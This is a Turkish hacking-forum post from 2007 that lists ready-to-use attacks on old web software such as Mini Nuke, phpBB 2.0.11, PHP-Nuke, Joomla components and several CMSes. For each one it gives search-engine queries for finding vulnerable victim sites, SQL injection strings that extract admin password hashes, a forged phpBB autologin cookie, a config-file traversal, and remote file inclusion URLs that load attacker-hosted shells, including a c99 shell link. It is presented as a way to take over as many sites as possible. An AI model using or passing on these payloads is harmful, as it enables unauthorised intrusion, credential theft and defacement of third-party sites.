The-Sabotage Cyber Hackers And Security Platform  

Portal Forum Kimler Online Bugünki Mesajlar Forumları Okundu Kabul Et
Geri git   The-Sabotage Cyber Hackers And Security Platform > || TSH || Hacking & Security > Web - Server Hacking & Security

Web - Server Hacking & Security Web Hacking Hakkında Bilmek istediğiniz Herşey,koruma yolları ve güncel açıklar ile ilgili Bölümümüz

Cevapla
 
LinkBack Seçenekler Stil
Alt 02-14-2007, 03:08   #1 (permalink)
KASRGA
Onursal Üye
 
KASRGA - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Feb 2007
Bulunduğu yer: LocaLhost
Mesajlar: 237
KASRGA - MSN üzeri Mesaj gönder
Bazı Sitelerdeki Var olan Acıklar

MİNİ NUKE V2.3



Mini nuke sitelerle uğraşmak için ilk önce



wwww.Google.com a giriyoruz ve: ’mini-nuke v2.3’ olarak aratıyoruz.



Karşımıza gelen sitelerin sonuna



:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1



Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.



MD5 i kırmak içinde



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]



CİGİCİGİ&GPLX

---------------------------------------------------------------------------



-VİRTUAL WAR V.1.0



ilk önce [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] ’Powered by: Virtual War v1.5.0’



Sonu /war.php olan siteleri seçiyoruz ve



war.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: //www.tuningclub.ch/config.dat?’ kodunu ekliyoruz.



Artık admin palenelindeyiz



[Eski bir açık olduğu için sonuç alamayabilirsiniz]





---------------------------------------------------------------------------

---

-PHPBB 2.0.11



işte meşhur phpbb açığı



Bize gereken en önemli program :



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] [Cooike Editör]



Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.



Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından



kurban phpbb 2.0.11 sitemizi seçicez.



Sitemizi bulduk 2 kez tıklıyoruz.



Önümüze a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bs%3A0%3A%2 2“%3Bs%3A6%3A“userid“%3B s%3A1%3A“2“%3B%7D Gibi Abudik



Kubidik Kodlar Gelicek Üssteki Kodu Slip



a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bb%3A1%3Bs% 3A6%3A“userid“%3Bs%3A1%3A% 222“%3B%7D Bu kodu yeryeştiriyoruz



Saveliyoruz.



Artık cooike editör ile işimiz bitti



Sitemizi yeniliyoruz bakıyoruz aaaa adminiz





---------------------------------------------------------------------------

-----

-PHP NUKE SQL INJECTİON



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] a giriyoruz aranacak kelimeye



’PHP-Nuke Copyright © 2004 by Francisco Burzi’ yazıyoruz.



Bulduğumuz sitenin search bölümüne ’p0gg0nsee%’) UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*’ yazmamız kafi



Search bölümünü bulamadıysanız



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]



Adminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.





---------------------------------------------------------------------------

------

-COM_REMOSİTORY



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] ’’inurl:"com_remository"



Bulduğumuz sitelere



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...][joomlapat....php?mosConfig _absolute_path=http://site/phpshell.php



Kodunu ekliyoruz...



---------------------------------------------------------------------------

-----------

-XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] ’inurl:modules/myAds/’



Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]



Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...



---------------------------------------------------------------------------

-------------

-TOPLİST HACK PHPBB



GoogLe Arama : inurl:"toplist.php" "powered by phpbb"





Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls





---------------------------------------------------------------------------

--------------

- PC_COOKBOOK JOOMLA COMPONENT



- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities



- Author: JaheeMCreW



- Uygulama : pc_cookbook Component



- Version : koyans 0.3



Yapmaniz gereken bir arama moturunda örnek google’ da



" allinurl:com_pccookbook " olarak aratmaktir..



Exploit :



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...][path]/compo...osConfig_absol ute_path=http://evilscript





---------------------------------------------------------------------------

-------------

-SİMPLE BOARD MAMBO



İlk Önce WwwW.GoogLe.com



Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]





---------------------------------------------------------------------------

-------------

-ShoutBox IncLusion



shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...



Code:



/shoutbox/expanded.php?conf=





GoogLe Arama : inurl:"/shoutbox/expanded.php?"



---------------------------------------------------------------------------

--------------

-PHPBAZAR <= 2.1.0 Remote File INCLLUSION



Google Search=inurl:classified.php phpbazar



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]





---------------------------------------------------------------------------

---------------

-BoastMachine [bmachine]



yeni gözde blog sistemi olan bmachine’in 2.8 versiyonunda bulunan ufak bi açık :



site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin



şifresini görüyoruz : )





---------------------------------------------------------------------------

----------------

-Limbo CMS <= 1.04 Remote File Inclusion



GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"





Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls

---------------------------------------------------------------------------

-----------------

-CaLogic Calendars V1.2.2 - Remote File Include



GoogLe Arama : CaLogic Calendars V1.2.2



kullanmak için :



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...][path]/reconfig....1;evil_script]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...][path]/srxclr.ph...1;evil_script]





---------------------------------------------------------------------------

------------------

-PafileDB Remote File Inclusion [phpBB]



PhpBB SiteLerde PafileDB ’deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..





http://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= http://[attacker]





---------------------------------------------------------------------------

-------------------

-JetBox CMS Remote File Include [ RFI ]



Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..



Uretici Firma : http://jetbox.streamedge.com/



JetBox CMS Remote File Include



http://[domain] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..




Aratma Kodu : PHP Upload Center v2.0

Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt?
KASRGA isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Cevapla



Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
Yeni Mesaj yazma yetkiniz Aktif değil dir.
Mesajlara Cevap verme yetkiniz aktif değil dir.
Eklenti ekleme yetkiniz Aktif değil dir.
Kendi Mesajınızı değiştirme yetkiniz Aktif değildir dir.

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık


Bütün Zaman Ayarları WEZ +3 olarak düzenlenmiştir. Şu Anki Saat: 16:22 .


eXTReMe Tracker
PageRank ?????????

Powered by vBulletin
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
SEO by 3.0.0
The-Sabotage Hacker's
Saldırıya Karşı Güvenlik Devrede
Sitemap
3, 4, 5, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 98, 99, 101, 102, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 135, 136, 137, 140, 141, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251,

Title
The-SaboTage Team* Terörle Mücadele Grup Komutanlığı* Özel Kuvvetler Grup Komutanlığı* Web Tasarım - Grafik Grup Komutanlığı* Personel Daire Başkanlığı* Savunma Grup Komutanlığı* Saldırı ve Operasyon Merkezi* || TSH || Hacking & Security* Hack'e Yeni Başlayanlar & Yardım Bölümü* Web - Server Hacking & Security* Video'lu Hack Anlatımları* Mail Hacking & Security* Pc Hacking & Security* İrc / Chat Hacking Ve Güvenlik* Exploit / Vulnerabilities* Keylogger & Trojan & Virüsler* Security* The-SaboTage Merkez Tanımı* The-SaboTage Duyurular* || TSH || Basında Biz ..* || TSH || Yeni Üyelerimiz ...* || TSH || Banned Users* Webmaster , Dizayn & Tasarım* Webmaster Bölümü* Photoshop & Flash* Google Adsense & Pagerank* Güncel Scriptler* PHP Scriptler* ASP Scriptler* Programlama Dilleri* Visual C.NET ve Visual C++.NET* Visual Basic ve Delphi* ASP ve PHP DiLLeri* Diğer Programlama Dilleri* Bilgisayar, İnternet ve Teknoloji Dünyası* Pc'niz İçin Güzel Programlar* Pc Oyunları* Resimli Program Anlatımı* Donanım & Donanım Sorunları* Bilgisayar Taktikleri & Bilinmeyenler* İşletim Sistemleri* Linux İşletim Sistemi* Windows İşletim Sistemi* İnternet Adresleri ( Bookmark )* Teknoloji Dünyasından Son Haberler* Msn & Yahoo Messenger Dünyası* Crack & Serials* İslam ve İnsan* İslami resimler* İslami Video ve fragmanlar* İslami programlar* Dini Hikayeler , Şiirler , Sohbetler* Dualar ve hadisler* The-SaboTage Cafe* Eğlence / Mizah / Geyik* Romantizm & Duygusallık & Sevgi* Derin Konular; Edebiyat/Felsefe* Tartışma Platformu* Eğitim , Öğretim & E-Kitap* Yerli ve Yabancı Mp3* Türkçe MP3* Yabancı MP3* Dizi Ve Film Müzikleri* Şarkı Sözleri* Yerli ve Yabancı Sinema* Vizyona Girecek Filmler* Türk Filmleri* Yabancı Filmler* Belgesel* Spor Köşesi* Beşiktaş* Fenerbahçe* Galatasaray* Trabzon Spor* Diğer Takımlar* Diğer Spor Haberleri* (Çöp Kutusu)* Çöp Kutusu* TsH United Foreigner Team The Area* Team Başvuru İnceleme Bölümü* Kriptografi (Şifreleme )* Güncel Açıklar* Karargah Destek Grup Komutanlığı* Ar-ge ve Yazılım Geliştirme Grup Komutanlığı* TSH Vip Bölüm (Priv8)* Vip Odası* M.KeMaL ATATüRK KöŞeSi* vbulletin* SMF* WordPress* oScommerce e-Ticaret Sistemi* Diğer* Joomla 1.0.x* Joomla 1.5.x* Joomla! İndir - Kur - Güncelle* Joomla! 1.0.x Resimli Dersler* Joomla! 1.0.x Güvenlik* Joomla! 1.0.x Soru - Cevap* Joomla! 1.0.x Eklenti İndir* Joomla 1.0.x Site Değerlendir* Joomla! 1.0.x SSS* Genel Sistem Soruları* Bileşen - Modül - Bot - Tema Soruları* Kurulumda Gelenler* Tema - CSS* Üye Yönetim* Haber - Yorum - İçerik* Güvenlik* Dil - Tercüme Eklentileri* Menü Eklentileri* Galeri - Ses - Görüntü* e-Ticaret* Dosya Yönetim* Uygunlaştırma - SEO - SEF* Form* Forum - Köprü - Entegre* Diğer Eklentiler* Tema - CSS* Üye Yönetim* Haber - Yorum - İçerik* Dil - Tercüme Eklentileri* Menü* Galeri - Ses - Görüntü* e-Ticaret* Dosya Yönetim* Uygunlaştırma - SEO - SEF* Form* Forum - Köprü - Entegre* Diğer Eklentiler* Joomla! Kurulum ve Güncelleme* Joomla! 1.5.x Soru - Cevap* Joomla! 1.5.x Tüm Eklentiler* Çeviri Talepleri* Proje Çözüm* Site Değerlendirme* Joomla! 1.5.x SSS* Genel Sistem Soruları* Eklenti Soru - Cevap* Kurulumda Gelenler* Tema - CSS* Üye Yönetim* Haber - Yorum - İçerik* Güvenlik* Dil - Tercüme* Menü* Galeri - Ses - Görüntü* e-Ticaret* Dosya Yönetim - Paylaşım* Form Araçları* Forum* Diğer Eklentiler* Haber - Duyuru - İndir* Soru - Cevap* Kurulumda Gelenler* Tema - CSS* Üye Yönetim* Haber - Yorum - İçerik* Güvenlik* Dil - Tercüme* Menü* Galeri - Ses - Görüntü* e-Ticaret* Dosya Yönetim - Paylaşım* Form Araçları* Forum* Diğer Eklentiler* vBulletin Genel Konular* vBulletin S.S.S* vBulletin Sorular & Cevaplar* vBulletin Siteleriniz* vBulletin Mod & Hack & Eklenti* vBulletin Temaları* vBulletin Dil Dosyaları* vBulletin Görsel Anlatımları* vBulletin Portal Entegrasyonları* Dökümantasyon* Modifikasyonlar* Sistem - İşletim* Temalar* Eklentiler* Temalar* osCommerce Soru - Cevap* osCommerce Kur - Güncelle* osCommerce Temalar* osCommerce Dil Dosyaları* osCommerce Eklentiler* osCommerce Güvenlik* osCommerce SSL - Pos - Ödeme* osCommerce Siteler* Php Fusion* Xoops* Mambo* PhpBB* myBB* IP.Board - Invision Power Board* Yazılı Anlatımlar-Dersler-Makaleler* Tanıtımlar-Tavsiyeler* Haberler-Gelişmeler-Duyurular* Görsel Anlatımlar (resim-video)* Hatırlatmalar-Uyarılar* Modifikasyon Soruları* Modifikasyon Tanıtımı* Kurulum ve Güncelleme* Dil Problemleri* Smf'de Başka sisteme geçişler* Başka sistemlerden Smf'ye geçişler* Portal birleşmeleri* Site Tanıtımları* Sizin Temalarınız* Tema Soruları* Tavsiye Temalar* IP.Board 2.3.x* IP.Board 2.2.x* IP.Board 2.2.x Altı* IP.Board Genel Bilgiler* IP.Board Dersler & Klavuzlar* IP.Board Güvenlik* IP.Board Dil Dosyaları* IP.Board Soru(n)larınız, Hatalar* IP.Board Siteler* ProfDizayn.com* Mambo Genel Sorular & Dersler* Mambo Bileşenler* Mambo Modüller* Mambo Temaları* Mambo Eklentileri* Mambo Çeviri* Mambo Siteler* Virüsler & Korunma Yöntemleri* Dökümanlar*